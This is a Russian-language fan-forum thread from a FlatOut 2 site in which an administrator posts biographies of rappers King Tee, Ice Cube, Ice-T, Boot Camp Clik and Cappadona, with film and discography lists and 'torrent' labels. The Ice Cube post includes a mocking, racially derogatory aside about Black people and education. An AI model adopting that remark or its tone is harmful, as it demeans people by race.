Main\Главная Profile\Мой 
профиль Enter in\Вход Get Out:)\Выход Registration\Регистрация Translator\Переводчик Music\Музыка
Group\Группа "Guests\Гости"Welcome\Прива! Guest\Гость
We are pleased to welcome you to our site! Here you can find the information you need about the game FlatOut 2, to communicate on various topics on the forum, play various mini-games, listen to and download music and much more. If you have problems or questions about this site - do not hesitate to ask (in chat or on the forum) \\\ Мы рады приветствовать вас на нашем сайте! Здесь вы сможете найти интересующую вас информацию об игре FlatOut 2, пообщаться на различные темы на форуме, поиграть в различные мини-игры, послушать и загрузить музыку и многое другое. Если у вас возникнут проблемы или вопросы по работе сайта - не стесняйтесь спрашивать (в чате или на форуме)
[ Private messages() · New messages · Members · Forum rules · Search · RSS ]
  • Page 2 of 2
  • «
  • 1
  • 2
Forum \ Форум » Main forum\Главный форум » Music\Музыка » RAP (Not shit, not glamour. Just a really cool rap.)
RAP
Iron_BYDate: Wednesday, 23.06.2010, 19:09 | Message # 21
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
King Tee

Его первые трэки были спродюсированы легендарным ди-джеем The Unknown DJ, который также помогал в записи ранних работ рэпперу Ice T.

Впоследствии, King Tee работал со многими другими продюсерами такими как: DJ Pooh, Marley Marl, DJ Broadway, Thayad, SLJ. Bilal Bashir и E-Swift.

Начиная с конца 80-х и в начале 90-х, King Tee выпускает несколько коммерчески неудачных альбомов и практически до середины 90-х не может найти поддержки ни от одного влиятельного лэйбла.

И хотя его альбомы сильно отличались от новомодного гангста направления и несомненно являлись устаревшими для современных слушателей, стоит отметить, что его работы с ведущими продюсерами того времени — DJ Pooh и E-Swift, делают их исторически значимыми и без сомнения они повлияли на дальнейшее развитие хип-хоп музыки.

Как и многие Лос-Анджелеские рэпперы, King Tee так и не поднялся до уровня национальной известности, но несмотря на это, на протяжении всех 90-х годов, успел поработать с большинством известнейших рэпперов Западного Побережья, включая Ant Banks, Too Short, Rappin’ 4-Tay, B-Legit, Xzibit, Ice Cube, Ice-T и многих других.

В 1993 году, на одном из Лос-Анджелеских рэп-сейшенов, King Tee знакомится с ребятами из начинающей рэп группы Tha Alkaholiks. Как закономерное продолжение этого знакомства будущие Tha Alkaholiks поработали на третьем альбоме King Tee «The Triflin’ Album», записав вместе с ним сингл «I Got It Bad Y’All».

Под чутким руководством и непосредственной помощи King Tee, Tha Alkaholiks записывают свой дебютный альбом и становятся невероятно популярными.

Но, собственная карьера King Tee, в целом, оставалась далеко не так успешна, даже не смотря на его сотрудничество с такими монстрами хип хоп индустрии, как Neptunes.

Вскоре, он подписывает краткосрочный контракт с только образовашимся лэйблом «Aftermath» принадлежавшим Dr. Dre и преуспевающий продюсер Dre пробует дать второй шанс развитию карьеры «неудачника» King Tee.

Но, его малозаметное появление (уже под псевдонимом King T) на альбоме «Тhe Dr. Dre Presents the Aftermath» и последующий плохо сколоченный, сольный альбом поставили жирный крест на дальнейшей работе с этим лэйблом.

Все же старый рэппер не сдает позиции в надежде на успех и делает несколько неплохих появлений на альбомах рэпперов Dr. Dre «2001» и Xzibit «Restless»…

Хочется еще раз повторить, что многие гангста рэпперы считают, что King Tee будучи на втором плане в рэп индустрии, своим творчеством открыл путь для некоторых сегодняшних мега-звезд хип-хопа. Он также являлся самым большим вдохновителем для мега-популярной рэп звезды Восточного Побережья, Notorious BIG, ранний стиль которого имел поразительное сходство со стилем King Tee.


\
\
\

Torrent

Attachments: 7287603.jpg (16.3 Kb)


 
Iron_BYDate: Monday, 16.08.2010, 22:59 | Message # 22
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Ice Cube

Начало банальное для таких историй - Ice Cube вырос в скромной семье в бедном квартале Лос-Анжелеса. Его настоящее имя O`Shea Jackson. Родители назвали сына в честь О. Джей. Симпсона, звезды американского футбола. О. Джей прославился скандальным судебным процессом: его обвиняли в убийстве жены, но адвокат спортсмена построил защиту на том, что белые присяжные предвзято настроены к черному подзащитному. Состав жюри неоднократно перетасовывался, пока наконец не подобрали людей оправдавших О. Джея. Вот в честь такого замечательного человека и получил имя юный O’Shea.

В молодости Ice Cube терся на улице (рос он в Южном Централе), занимался мелким подрезаловом, но в серьезных преступлениях никогда не участвовал. Более того - чувак закончил колледж и поступил в институт. Уже юношей Ice Cube прослыл талантливым рэппером, чьи рифмы - не образцы высокой поэзии, но хлесткие, легко запоминающиеся строки - необычайно быстро находили почитателей. Так что когда матерый бандит и пушер Eazy-E взял его в оборот, Cube возможно не совсем понимал с кем имеет дело и как себя надо вести, чтобы потом за базар не отвечать. Eazy предложил Кьюбу сочинить для него какой-нибудь текст и неожиданно получил будущий хит «Boyz-n-the-Hood». Уцепившись за талантливого юношу, Eazy предложил ему сформировать группу N.W.A (Niggaz With Attitude). Вместе с ними в команде работали: будущий краеугольный столп рэпа - Dr.Dre, а также не оставившие столь значительного следа в истории MC Ren и DJ Yella. Ради участия в «супергруппе» Ice Cube бросает институт.

После альбома «Straight Outta Compton» они стали иконами. В 1989 бескомпромисная песня «Fuck the Police» заставила руководство ФБР написать гневное письмо в адрес выпускающего лейбла и поднять шум в конгрессе! Успех был потрясающий, но контракт, составленный ушлым Eazy-E, оставил Айс Кьюба - автора большинства песен - с жалкими грошами. Это сюжет из разряда вечных - миллионы Тайсона точно таким же образом украл его промоутер Дон Кинг. Так что, ходили бы вы негры в школу - глядишь, зажили бы лучше.

Отпахав 4 года на каторге Eazy-E, сочинив подавляющее большинство текстов для N.W.A. и сольников Eazy-E, Cube прикинул прибыль своего босса, сравнил со своими крохами и покинул эту компанию. Естественно, жестоко обидевшись. А кто бы не обиделся? Вот и Ice Cube был несколько…э-э-э, раздосадован. Потому что через год крепко прошелся по бывшим друзьям-товарищам в песенке «No Vaseline», повеселив общественность строчками, о том, что «хер Eazy пахнет говном MC Ren’a». Но популярность к нему пришла отнюдь не из-за смакования натуралистических подробностей.

Первый же альбом, выпущенный «Кубиком» в 1990 году, срывает банк. Если на Востоке главными борцами за права черных считались Public Enemy, то на Западе таковым становится Ice Cube. Каждая вторая песня на дебютном «AmeriKKKa`s Most Wanted» - хит. А песен было 16! В том числе такое «мясо», как: «The Nigga Ya Love To Hate», «AmeriKKKa’s Most Wanted», «Who’s The Mack?». Священная ярость кипела в сердце Кьюба - коллеги по NWA скурвились, поселились в богатых особняках, но он по-прежнему клялся в вечной верности вскормившим его улицам и уделял причитающуюся долю «теплых слов» всем притеснителям черной расы. При этом не нужно забывать, что Cube не был ангелочком - в своих песнях он давал чертей корейцам, азиатам, педикам, политикам, а в добавок был сексуально распущен - настоящий подонок и пугало для блюстителей нравственности.

Следом за альбомом выходит очень успешный макси-сингл «Kill at Will», а в 1991 - шедевральный «Death Certificate» (на обложке которого изображен лежащий на каталке труп), лишь на месяц опередивший знаменитый черный бунт в Лос-Анжелесе. Беспорядки, продолжавшиеся несколько дней, были вызваны оправдательным приговором суда по делу полицейских, избивших черного Родни Кинга и запечатленных случайным свидетелем. Имя Родни Кинга стало нарицательным - он часть истории борьбы черных за свои права - и прозвучало в текстах многих рэпперов. Видеозапись этого инцидента облетела мир, став катализатором самых крупных уличных беспорядков в современной истории Америки. После этих событий жесткий хард-кор «Death Certificate» выглядел пророческим, а сам Cube стал живым символом сопротивления. Почти как Ленин, Че Гевара и Мартин Лютер Кинг.

В 1992 году вышел еще один отличный альбом «The Predator» (с боевиками «Check Yo Self», «Wicked» и «It Was A Good Day»), закрывший (по мнению части поклонников и критиков) славную историю Ice Cube. Следующий диск «Lethal Injection» был похож на смертельную инъекцию для самого Айс Кьюба, как автора актуальных для своего времени альбомов. На сцене Америки звучал «Chronic» Доктора Дре. Надвигалась эпоха G-фанка, критика всего и вся не находила прежнего отклика у слушателей. Бунтарям показали деньги…и время бунтов закончилось - новыми героями стали удачливые парни с большими «мазафакер ганами» и толстыми цепями. Ice Cube не отошел от дел - на его счету были записанные с интервалом в два года альбомы «War & Peace» (соответственно первая и вторая части; на второй Cube, Dre и MC Ren прощают былые обиды и делают совместный трек «Hello», породив слухи о воссоединении N.W.A.), сборники лучших вещей и бутлегов, продюсирование Da Lench Mob и Yo-Yo, участие в рок-фестивале Lollapalooza и совместная работа с металлистами Korn; биф и примирение с другими важными калифорнийскими рэпперами, командой Cypress Hill; наконец объединение с единомышленниками Macк 10 и WC в группу Westside Connection и издание двух альбомов («Bow Down» - 1996, «Terrorist Threats» - 2003).

Но возможно и этот внушительный список свершений и достижений не позволял бы ему по-прежнему считаться звездой высшего эшелона, если бы параллельно Айс Кьюб не добился бы выдающихся успехов в кинобизнесе. Ice - один из немногих рэпперов, которых на полном серьезе можно называть киноактерами. То есть он не только может сыграть самого себя, но способен на большее. Дебютом Кьюба стал культовый фильм «Boyz N the Hood», посвященный реалиям гетто. Эту же тему эксплуатировали следующие его роли в «CB4» и «Tresspass». Но первым настоящим успехом стала культовая комедия «Пятница». Ice Cube был режиссером, со-сценаристом (вторым был ди-джей Pooh), продюсером и исполнителем одной из главных ролей. Комедийные задатки его партнера Криса Таккера и отличный саундтрек, собранный из лучших образцов хип-хопа 1995 года, стали залогом успеха фильма. «Пятница» и поныне пользуется любовью поклонников хип-хопа всех поколений. На волне успеха Ice Cube открывает собственную кинокомпанию - Cube Vision. Не «Dreamworks», конечно, но на хлеб с маслом и икоркой - хватает.

В 1997 году Ice Cube снимается в «Анаконде» с Дженифер Лопес, в 1999 - в «Трех королях» с Джорджем Клуни и Марком Уолберком (ех-рэппером Марки Марком). Комедии «Следущая Пятница» (продолжение, как водится, оказалось слабее оригинала), «Все о Бенджаминах», «Парикмахерская» и «Пятница после следущей Пятницы» делают Кьюба завсегдатаем съемочных площадок. Съемки стали для Cube не понтом и рекламой релизов, а неплохим бизнесом. Достаточно сказать, что душевная комедия «Парикмахерская» принесла колоссальные сборы, сделав Кьюба королем афро-американского кино (конечно, после Спайка Ли). Айс продолжает говорить о возможности воссоединения NWA и записи следующего альбома в сотрудничестве с Dr.Dre, но у архитектора джи-фанка слишком много дел - Эм, Полтинник и т.д… Сейчас Дре, например, готовится выпустить на большую сцену новую зубастую рыбу - рэппера The Game, осознанно копирующего эстетику NWA конца восьмидесятых. Хотя к чему копии, когда оригиналы, свидетели тех славных деньков еще с нами и по-прежнему полны сил. Cube все-таки разродится долгожданным сольником (перерыв в 5 лет - это уж слишком, он обязан сжалиться над нами), только дайте ему закончить съемки в продолжении блокбастера «XXX». Новый Ice - не раньше следующего года.

Фильмография:

Ice Cube снимался в фильме «Firth monday»
«Ребята по соседству» (1991) — Дарин «Пончик» Бэкер
«Нарушение границ» (1992) — Савон
«Си-би-4: Четвёртый подряд» — себя
«Стеклянный щит» — Тедди Вудс
«Высшее образование» — Фадж
«Пятница» (1995) — Крэйг Джонс
«Опасная территория» (1997) — Вуси Мадлази
«Анаконда» (1997) — Дэнни Рич
«Клуб игроков» (1998) — Реджи
«Я кое-кого знаю» (1998) — контрабандист
«Три царя» (1999) — старший сержант Чиф Элгин
«Толще воды» (1999) — Слинк
«Следующая пятница» (2000) — Крэйг Джонс
«Призраки Марса» (2001) — Джеймс «Опустошение» Уильямс
«Всё о Бенджаминах» (2002) — Букум
«Парикмахерская» (2002) — Кэлвин Палмер
«Через одну пятницу» (2002) — Крэйг Джонс
«Крутящий момент» (2004) — Трей
«Парикмахерская 2: Опять в деле» (2004) — Кэлвин Палмер
«Уже приехали?» (2005) — Ник Персонс
«XXX: Новый уровень» (2005) — Дариус Стоун/xXx
«Мы уже закончили?» (2007) — Ник Персонс
«Первое воскресенье» (2008) — Дьюрелл
«Мизерный шанс» (2008) — Кертис Пламмер

Дискография:

AmeriKKKa’s Most Wanted (1990)
Kill At Will (1990) EP
Death Certificate (1991)
The Predator (1992)
Lethal Injection (1993)
Bootlegs & B-Sides (1994)
Featuring… (1997)
War & Peace - Volume 1 (The War Disc) (1998)
War & Peace - Volume 2 (The Peace Disc) (2000)
Greatest Hits (2001)
Laugh Now, Cry Later (2006)
In The Movies (2007)
Raw Footage (2008)

discography

Attachments: 5663445.jpg (29.8 Kb)


 
Iron_BYDate: Monday, 16.08.2010, 22:59 | Message # 23
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Ice-T

ce-T (настоящее имя Tracy Morrow, родился 16 февраля 1958 года, в Ньюарк (Newark), Нью-Джерси, США) является одним из самых внятных и интеллектуальных звезд хип-хоп музыки, так же он известен как один из самых печальных поэтов. В своих лучших произведениях, рэппер очень тонко описал портреты жизни гетто и гангстеров. Он задевал темы дискриминации и насилия, и даже тогда его рифмы были умны и резки. Лучшие композиции Ice-T всегда были сделаны в сотрудничестве с хорошими музыкантами, будь то Bomb Squad или Jello Biafra. чтобы стать уважаемой фигурой не только в музыкальной прессе, но и в господствующих средствах массовой информации, Ice-T всё время противостоял постоянному напору критики и противоречий.

Хотя он был одной из ведущих фигур Калифорнийского хип-хопа в 80-ых годах, Ice-T был родом не из Калифорнии, а родился он в Ньюарк. Ещё ребёнком, он переехал из своего родного города в Калифорнию, после того, как его родители погибли в автомобильной аварии. Во время учёбы в средней школе под названием «Crenshaw», что находится в Южном Централе в Лос-Анджелесе, он был сильно увлечён рэп музыкой. Его псевдоним произошёл от сутенёра по имени Iceberg Slim, который писал романы и поэзию. Ice-T использовал запоминающиеся строки поэзии Айсберга Слима, рассказывая их потом своим друзьям и одноклассникам. В начале 80-ых годов, после того, как он оставил среднюю школу, он записал нескольких непримечательных 12-ти дюймовых (12’‘) синглов. Он также снялся в низкобюджетных хип-хоп фильмах Rappin ‘, Breakin ’ и Breakin’ II: Electric Boogaloo.

Наконец Ice-T подписывает контракт с «Sire Records», и в 1987 году выходит его дебютный альбом под названием «Rhyme Pays». На лейбле его поддерживали DJ Aladdin и продюсер Afrika Islam. Люди, которые помогли создать музыку, биты и семплы, которые обеспечили отличный фон для харизматических рифм рэппера. В этом же самом году, он записывает песню для кинофильма Денниса Хуппера, под названием «Colors», фильм о жизни старой части Лос-Анджелеса. Песня была названа также как и фильм, она была более сильной, и лирически и музыкально, с более острой лирикой, чем раньше.

В 1988 году Ice-T сформировывает свой собственный звукозаписывающий лейбл под названием «Rhyme Syndicate», и выпускает свой следующий альбом под названием «Power». «Power» был более уверенным и внушительным альбомом, заработавший хорошие оценки критиков.

В 1989 году выход альбом под названием «The Iceberg/Freedom Of Speech…Just Watch What You Say», который сделал Ice-T истинной суперзвездой хип-хопа. Альбом содержал в себе превосходную музыку, жёстокие, интеллектуальные рассказы, и политические комментарии.

Два года спустя, Ice-T начинает актёрскую карьеру, сыграв главную роль в «чёрном» фильме под названием «New Jack City». Он также записал песню для этого фильма, под названием «New Jack Hustler». Эта композиция стала одной из центральных композиций на вышедшем в 1991 году альбоме под названием «O.G.: Original Gangster», который является его самым успешным альбомом до настоящего времени. Также на альбоме отметилась группа под названием «Body Count», записавшая с Ice-T трек под одноимённым названием «Body Count».

Летом этого же года группа совместно с Ice-T участвовала в туре «Lollapalooza». Выступление в туре увеличило популярность Ice-T среди фанатов альтернативной музыки и среди среднего класса подростков. В следующем году, рэппер выпустил полный альбом с Body Count.

Группа Body Count оказалась главным поворотным моментом в карьере Ice-T. На основании трека под названием «Cop Killer», где он читал от имени полицейского убийцы, зажглись национальные противоречия. Против трека стали протестовать «NRA» и полицейские активистские группы.

«Time Warner Records» первоначально поддерживающие Ice-T, всё же отказались выпускать его новый альбом под названием «Home Invasion». В итоге Ice-T и звукозаписывающая компания разорвали контракт между собой. «Home Invasion» был выпущен на «Priority Records» весной 1993 года.

Со временем Ice-T начал терять большинство своей первоначальной хип-хоп аудитории. Теперь его слушали, прежде всего, белые подростки. В 1994 году, он написал книгу и выпустил второй альбом группы Body Count под названием «Born Dead», который не был таким скандальным как их первый альбом и не привлёк большого внимания. Однако Body Count были популярны в клубах, и Ice-T продолжал совершать туры с группой.

Летом 1996 года, Ice-T выпускает свой первый альбом за долгий перерыв, «Return Of The Real».

Альбом «7th Deadly Sin» следовал в 1999 году. После чего Ice-T, возвращается в актёрскую карьеру, взяв роль в фильме «Law & Order: Special Victims Unit».

discography

bonus

Attachments: 0217972.jpg (79.4 Kb)


 
Iron_BYDate: Monday, 15.11.2010, 03:14 | Message # 24
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Boot Camp Clik

Биография

Хип-хоп-головы могут не раскалываться от напряжённых поисков надежды на спасение своей веры и культуры. Ведь группа уникальна и практически не имеет аналогов. Объясню почему: в хип-хопе андерграунд и мэйнстрим, oldschool и newschool - это не одно формирование, состоящее из множества МС. В нём есть и не одна семья или объединение - называйте как вам угодно. Но ВСС отличается от первых тем, что создан сразу из нескольких групп, причём довольно самостоятельных и известных, а от вторых - совместным выпуском сборных LP. Пока что для вышеуказанных семей такие узы не закрепляются общими альбомами, разве что за некоторыми исключениями им подобных, но всё же не первых в жанре. В общем, они были ву-тенгом ещё до Wu-Tang.

Прославляемый, воспеваемый в одах родной Bucktown (местное название Brownsville - части Brooklyn, NY) стал колыбелью рэпа и домом для неподражаемых M.O.P., Smoothe Da Hustla & Trigga Da Gambla, Dr.Period и, конечно же, ВСС: то есть для лучших пушеров и спиттеров. А их новый альбом «The Last Stand» - уже третий сообщнический релиз, который был издан в конце лета 2006 года и с которым они уже исколесили всю страну в рамках промоутерского тура. Он выплеснул ностальгические ноты, накопившиеся у группы за всё время творчества, и является воссоединением одной из самых true&real хип-хоп-группировок. Если тебя удивляют столь громкие и похвальные фразы в адрес группы, если ты считал, что знаешь немало о культуре, но о группе слышишь впервые или вроде того, тогда, я думаю, не стоит говорить «гоп», пока не перепрыгнешь: ни тебе, ни мне.

Для начала о составе. Первенцами, заложившими фундамент в будущем храме ВСС, стала команда Black Moon, состоящая из DJ Evil Dee (учредителя легендарной битмейкерской команды Da Beatminerz и не менее исторической студии D&D), Buckshot [Shorty] и 5FT. Группировка в основном составе выглядит следующим образом: Buckshot из Black Moon; Smif’n’Wessun aka Cocoa Brovaz (состав - [Smokeellah] Tek и Steele); OGC (Originoo Gunn Clappaz) (состав - Starang [Wondah], Louieville [Sluggah] и Top Dog [Big Kahuna]; Heltah Skeltah - Sean Price [Ruck] и Rockness Monsta [Rock]. Этот костяк и называет себя Boot Camp Click, а вот их ответвление и лейбл Duck Down неоднократно меняло (в основном, в сторону увеличения) свой состав за долгие годы существования. Вот некоторые из них: The Representativz, Rustee Jux, Illa Noyz, Doc Holiday, Hardcore, Eek-A-Mouse, DJ Logic, Shucky Ducky, Dru-Ha, MFC, BTJ’s…

Уже в далёком 92-ом, в период расцвета и становления хип-хопа, выход первого сингла Black Moon «Who Got The Props» и видео к нему с бюджетом всего $6000 стал революционным переворотом всей культуры. Во-первых, почти впервые, ещё до явления народу Wu-Tang и Onyx, МС вещали не только от своего имени, но и репрезентировали свою команду, опасную и закамуфлированную, за что так и не получили должных «респектов» и «рекогнайзов», в отличие от уже приведённых в пример подобных открытий.

С другой стороны, дымящие, как паровозы, сенсимильей, тусующиеся вечно с рюкзаками, набитыми краденой утварью, продаваемой в полцены, и гремящие цепурами простые уличные парни, участники ВСС, никогда не били себя в грудь, крича, что нету их круче. Несмотря на то, что Buckshot всё в том же первом сингле Black Moon рассказывал нам о своих широких джинсах, кроссовках за $100 и модном пейджере (круто!), он и остальные никогда не претендовали на звание «гламурных подонков», хотя и в этом стали первопроходцами. Если бы они знали, что через лет 15 все только об этом и будут горланить в своих рэпах, позабыв, кто и зачем делал это изначально, наверняка не подавали бы такого примера. А пример был рассчитан на поднятие самооценки у простых чёрных братьев и не имел цели вызвать у них зависть. Не все слушатели и фанаты - гангстеры или радикальные молодые идеалисты, уже взращённые на хип-хоп-культуре, да и самих себя ребята из ВСС определяют как «understream mainground niggas», т.е. такими же людьми, для которых они всегда и старались.

Вместе с Black Moon и Beat Miners над их первым альбомом в студии работали и друзья по Franklin Avenue, а также их верный менеджер Dru-Ha. Ребята вспоминают, как они дневали и ночевали в студии, спя прямо на полу, охраняли студию от налётчиков и копов. В общем, альбом получился жизненным и стал примером для подражания и заимствования стилей, но об этом история умалчивает - ведь никому не хочется признаться, что он учился у других тому, что выдаёт за свои заслуги. Позже, в 95-ом, выходит кавер-версия альбома под названием «Diggin’ In Dah Vaults», собравшая неизданные треки и более удачные ремиксы на не самые удачные вещи первого LP.

В 1995-ом выходит LP от Smif’n’Wessun «Dah Shinin’», а в 1996-ом - LP от OGC «Da Storm». Надо отметить, что и в их стиле есть большая доза аутентичности - пропагандируя культуру раста, этим командам удалось совместить хардкор-рэп с элементами залихватских раггамаффин-подрифмовок. Лучше них это не удавалось сделать никому, кроме «учителя» KRS-1 и его последователей Channel Live, а также неподражаемых Das EFX и L.O.T.U.G. (Lords Of The Underground). А свои воинственные названия они с лихвой подтверждают настроем и лирикой: мол, хоть мы и не гангстеры №1, но шутки с нами плохи. Beat Miners, спродюсировавшие оба LP, тоже очертили свой низкобасовый и высокочастотный стиль, в котором демонстративно преуспели. Кстати, OGC свой LP издают уже не на Nervous rec., первом звукозаписывающем партнёре Duck Down. Buck Shot, исполнительный продюсер лэйбла, отказался выпускать под руководством Nervous запланированные второй LP Black Moon и другие релизы, обвиняя их в укрывательстве доходов, невыплате положенных гонораров, и ввиду этого разрывает контракт с ними, заключив новый с Priority rec., к тому времени уже ставшей пристанищем для разочарованных аналогичными случаями Ice Cube и Master P. Но для Duck Down и эта сделка со временем оказалась очередным опрометчивым шагом, а выпуск следующего LP от Black Moon пришлось отложить до… 1999 года.

Priority, воодушевлённые продажей свыше 250 тысяч копий «Da Storm» в кратчайшие сроки, наконец-то дают возможность реализовать себя и более взрослому, чем OGC & Smif’n’Wessun, дуэту Heltah Skeltah. Их альбом «Nocturnal» стал чем-то неслыханным доселе, ещё более безбашенным и диким, чем альбомы хоуми, а чтобы отличаться во всём, да и во имя прогресса, вместо Beat Miners использован ряд других битмейкеров, но всё же очень удачно выдержан командный дух. Heltah Skeltah в переводе означает «шум, гам», и, похоже, они тоже стараются соответствовать своему названию и выбирали его не от фонаря. «Nocturnal» выделяется даже обложкой, на которой МС зависли вверх ногами, прикинувшись летучими мышами. Rock и Ruck показали пример в умении абстрагироваться от стереотипов в поиске новых дверей в бесконечном коридоре творчества. Rockness Monsta встряхнул всю индустрию, в чём-то переплюнув своей замысловатой, протяжной манерой рифмовки самих Busta, Redman и KRS-1. А Sean Price продемонстрировал такой отточенный манерный рэп, что, наверное, сам Buck Shot позавидовал его сноровке. Да и Priority была приятно удивлена, ведь только за первую неделю было продано 30 тысяч копий LP. Пытаясь по максимуму раскрутить свой лейбл Duck Down при помощи нового звукозаписывающего партнёра, ребята все деньги, собранные с выступлений и турне, вкладывали обратно в Priority, т.е. в студийную работу, но отдача по-прежнему была минимальной. Однако выбирать не приходилось, да и те результаты казались успехами на фоне прежнего опыта.

Dru-Ha, белый представитель чёрной культуры, помощник исполнительного продюсера ВСС, по совместительству битмейкер и МС, вместе с Buck Shot стоявший у самых истоков группы, в 97-ом посетил ежегодный хип-хоп-фестиваль Lyricist Lounge, в котором участие принимал некий Marshall Mathers… Уже на следующий день он провёл встречу с его менеджером (Paul Rosenberg), договорившись о контрактном присоединении Eminem к Duck Down, но, казалось бы, преуспевающая и ожидаемо благодарная Priority «не находит на это средств…» (?!). Сегодня это звучит просто дико, но тогда Eminem не отличался от многих начинающих рэпперов, да ещё был не хип-хопового цвета. Короче, знай Priority прикуп…

В 97-ом выходит первый совместный альбом ВСС «For The People», не продавшийся даже вполсилы по сравнению с Heltah Skeltah. Произошло это не от низкого качества продукции - и смысл, и музыка в порядке. Прогадали они с некомпозиционным построением LP, больше напоминающим сборник, и со снова практически отсутствующим продакшном от Beat Miners, в силу чего подборка стилей треков тоже звучала вразнобой. Последовавшие релизы: «The Awakening» от Cocoa Brovas 98-го и LP 99-го - OGC «The M-Pire Shrikes Back», Heltah Skeltah «Magnum Force» и даже долгожданный LP Black Moon «Warzone», вернувший Beat Miners на поле боя, не оправдали надежд Priority на платину. Наверное, приобретали эти альбомы только верные фаны, а половина слушателей боялась разочарования после «For The People». И виной всему стала ещё более низкопробная рекламная кампания Priority - на клипы денег жали, на радио-раскрутку тоже особо не распылялись. Это, конечно, зря, ведь и продюсеры выложились и подобраны были очень тщательно, а в каждом LP присутствовали звёзды всего американского рэпа, не говоря уже о добротном содержании и новых выдумках ВСС. Так и не увидел свет совместный LP OGC и Heltah Skeltah - Fab 5, впрочем, как и многие другие запланированные к выпуску на Priority LP остальных участников этой немалой формации. Последними выходят LP от The Representativz - сборники «Duck Down Presents» и сольный релиз Rock из Heltah Skelath, выпущенный уже тогда, когда остальная часть Duck Down оказалась за бортом. Это послужило причиной ссор и взаимных непониманий между ним и командой, длившихся не один год.

Dru-Ha aka Lil Caucasian, он же Dru Friedman, всегда был самым надежным оплотом ВСС - все договоры с ним заключались на словах, твёрдо сдерживаемых продюсером. Когда-то он занимался промоушном Black Moon всего-то за $75 в неделю, выделяемых Nervous rec. После расторгнутой сделки с Priority Dru прокладывает сложный путь к выпуску 12» (виниловых) синглов, поддерживая пламя в потухшем очаге ВСС и Duck Down. Его заслуга - винил Cocoa B’s «Super Brooklyn», принесший им контракт с Rawkus, а сингл Sean Price «Don’t Say Shit To Ruck», возможно, послужил именно тем толчком, без которого его сольная карьера не состоялась бы. Он же помог дистрибутировать проект Buck Shot «The Beady-Eyed Thug» (BDI Thug), вышедший на K-Tel rec., к сожалению, обанкротившейся через 3 недели после его выпуска.

Позже сорвалась ещё одна надежда: Dr. Dre, встретивший Buck и знавший о ряде фиаско его команды, предложил сотрудничество. Он выслал Buck и Dru 2 билета в Лос-Анджелес, где они провели пару дней за переговорами. Dre прислал им пару битов от Abnormal, на которые предложил наложить вокал. Ребята из ВСС так и сделали, выслав демки Mike Lynn, работавшему с Dre. Вскоре им перезвонили и сказали, что надо быть наготове к возвращению в Лос-Анджелес, но дальнейшего развития событий так и не последовало.

Устав от захлопывающихся перед самым носом дверей, ВСС снова сгруппировываются и получают дистрибьюторское право издаваться благодаря миссионерской и благородной вездесущей KOCH Ent. Их второй совместник «The Chosen Few»- символ их способности мобилизоваться и учиться на своих ошибках. Альбом реабилитирует их в глазах многих интересующихся и доказывает, что независимо от того, какой сейчас год на дворе - если ты шагаешь в ногу со временем, оставаясь верным старой школе, то останешься и у штурвала. По мнению DJ Evil Dee, традиционно приложившему руку к его созданию, у «The Chosen Few», как и у первых релизов, по-прежнему есть душа, но теперь она обрела тело, которое стойко держится на своих двоих. Очень слаженно сработанный альбом, подходящий всем, кто более или менее интересуется хип-хопом. Не хватало только безбашенного Rock, к тому моменту ещё не сгладившего неровности во взаимоотношениях с «кликой». Поскольку ВСС стал уже историей, а молодёжь не с особым рвением интересуется ею, довольно приятно, что альбом всё же завоевал новых слушателей, а МС (кстати, тоже обычные человеки) смогли снова почувствовать себя нужными и востребованными после стольких лет неурядиц. Это и правда стимулирует как ничто иное.

В 2005 году «Duck Down» вновь обрушивает на нас новую маркетинговую задумку, получившую кодовое название «Triple Threat» («Тройная Угроза»). За четырехмесячный период изданы: сходу ставший в один ряд с классическими дебютными сольниками долгожданный «Monkey Bars» от Sean Price, в котором уже снова присутствует его партнёр Rockness, да и многие другие участники ВСС; третий LP Smiff &Wesson «Reloaded», наверное, решивших, что старое название несёт более позитивную карму; а папа Buckshot объединился с модным андеграунд-продюссером 9th Wonda, сделав свой второй сольник «Chemistry». Buckshot, придерживаясь позиции поучающего мудреца, которого взрастила улица, выговорился за последнюю пятилетку и еще на пятилетку вперед (хотя не хотелось бы), оставив всех стоять на месте, почёсывая затылки - в общем, порадовал. DJ 9th Wonda тоже очень старался, и они сошлись в творческих вкусах. 9th, похоже, новое дарование в битмейкинге, который не только умело делал мейнстримовые хиты для суперпопулярных МС вроде Jay-Z и Jadakiss, но в том же году вместе c cамим Pete Rock успел состряпать музыку к пятому альбому OC (из DITC) «Smoke & Mirrors». Также 9-ое Чуда в 2006-м сделал музон для альбома андерграундного исполнителя Murs. В общем, это всё к тому, что ВСС всегда окружает себя только избранными и реальными людьми. Напрашиваясь на аплодисменты, с трудом и терпением они добились уважения и нового признания. Кто знает, может, это начало нового витка их карьеры, более грациозного и мастерского. Ведь снова в полном составе, с пройденной школой жизни и рюкзаком теперь уже не шмоток, а skillz и technique (навыков и техники) за плечами, не гонясь за популярностью, но выбившись и держась зубами, они должны только добавить гари.

А сам Buckshot добавляет: «Не нужен Nate Dogg или Akon, чтобы сделать путёвый трек. Ниггаз в клипах и на сценах лупят себя по задницам, надевают блестящие костюмы и галстуки, только чтобы их музло пользовалось спросом у кого ни попадя, а потом от их молодых последователей им бумерангом достаются вещи вроде «Lick My Neck, Lick My Back». И страдают при этом не только они, но и вся культура, в которой поклонники начинают разочаровываться именно из-за таких вот запусков. Многие из таких образцов просто не являются владельцами афишируемых ими роскошей, средств передвижения, пушек, а бриллианты и деньги - простая подделка. Иногда они не являются и хозяевами лейблов, которыми они якобы ведают. Теперь, к примеру, я могу взять свои мастеры и микшеры и сжечь их, если мне захочется. В общем, хочешь славы - присоединяйся к основным, а хочешь заработать и завоевать авторитет для себя - не думай о второстепенном и наберись терпения».

Discography (till 2007)

Attachments: 5081731.jpg (39.3 Kb)


 
Iron_BYDate: Monday, 06.12.2010, 06:19 | Message # 25
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Cappadona

torrent

Wuuu !!!

Attachments: 6904617.jpg (21.7 Kb)


 
Iron_BYDate: Tuesday, 30.08.2011, 15:13 | Message # 26
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
